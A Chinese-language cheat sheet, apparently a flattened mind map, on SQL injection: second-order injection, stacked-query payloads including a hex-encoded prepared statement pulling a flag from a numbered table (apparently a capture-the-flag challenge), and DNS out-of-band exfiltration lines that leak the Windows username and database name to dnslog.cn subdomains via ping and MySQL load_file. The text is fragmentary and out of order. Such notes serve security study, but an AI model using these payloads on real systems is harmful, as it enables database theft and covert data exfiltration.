二次注入
:插入后调用显示操作符合数据由自己添加插入
程序更新或查询,把攻击语句·取出来调用
条件
堆叠注入
根据数据库类型决定是否支持多条语句执行';show databases;
';show tables;
';show columns from 1919810931114514;
';select flag from 1919810931114514;
';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;
语句
MYSQL
MSSQL
Postgresql
支持的数据库
DNS外带
ping %USERNAME%.7logee.dnslog.cn
命令执行
select load_file(concat('\\',(select database()),'.7logee.dnslog.cn\aa'));and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc')))
SQL 注入
解决不回显
反向连接
SQL 注入
命令执行
SSRF
应用场景
平台
网友评论